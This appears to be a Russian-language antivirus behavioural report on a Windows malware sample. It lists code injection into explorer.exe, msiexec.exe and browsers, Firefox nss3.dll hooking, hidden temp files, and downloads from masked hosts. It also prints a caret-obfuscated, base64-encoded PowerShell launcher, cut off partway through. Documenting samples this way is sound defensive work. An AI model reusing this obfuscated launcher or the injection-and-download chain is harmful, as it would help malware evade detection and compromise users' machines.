Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C P^Ow^eRs^HE^ll -e WwBTAHkAcwB0AEUATQAuAFQAZQB4AFQALgBlAG4AQwBvAGQAaQBuAGcAXQA6ADoAdQBuAGkAYwBPAEQARQAuAGcARQB0AFMAdAByAEkATgBnACgAWwBTAHkAcwB0AEUAbQAuAEMATwBuAFYAZQBSAHQAXQA6ADoAZgBSAG8ATQBC...
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
- %WINDIR%\syswow64\msiexec.exe
следующие пользовательские процессы:
- dgdu_hfd6.exe
- iexplore.exe
- firefox.exe
Перехватывает функции
в браузерах
- Процесс firefox.exe, модуль nss3.dll
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bit4d18.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\bit4d18.tmp
Удаляет следующие файлы
- %TEMP%\dgdu_hfd6.exe
Перемещает следующие файлы
- %TEMP%\bit4d18.tmp в %TEMP%\dgdu_hfd6.exe
Сетевая активность
Подключается к
- 'mo####loa.online':80
TCP
Запросы HTTP GET
- http://mo####loa.online/jss/binss2.jpg
UDP
- DNS ASK mo####loa.online
- DNS ASK as####jboston.com
Другое
Создает и запускает на исполнение
- '%TEMP%\dgdu_hfd6.exe'
- '<SYSTEM32>\cmd.exe' /C P^Ow^eRs^HE^ll -e WwBTAHkAcwB0AEUATQAuAFQAZQB4AFQALgBlAG4AQwBvAGQAaQBuAGcAXQA6ADoAdQBuAGkAYwBPAEQARQAuAGcARQB0AFMAdAByAEkATgBnACgAWwBTAHkAcwB0AEUAbQAuAEMATwBuAFYAZQBSAHQAXQA6ADoAZgBSAG8ATQBC...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e WwBTAHkAcwB0AEUATQAuAFQAZQB4AFQALgBlAG4AQwBvAGQAaQBuAGcAXQA6ADoAdQBuAGkAYwBPAEQARQAuAGcARQB0AFMAdAByAEkATgBnACgAWwBTAHkAcwB0AEUAbQAuAEMATwBuAFYAZQBSAHQAXQA6ADoAZgBSAG8ATQBCAEEAUwBlADYANABzAH...
- '%WINDIR%\syswow64\msiexec.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%TEMP%\dGDU_HfD6.exe"
- '%ProgramFiles(x86)%\mozilla firefox\firefox.exe'
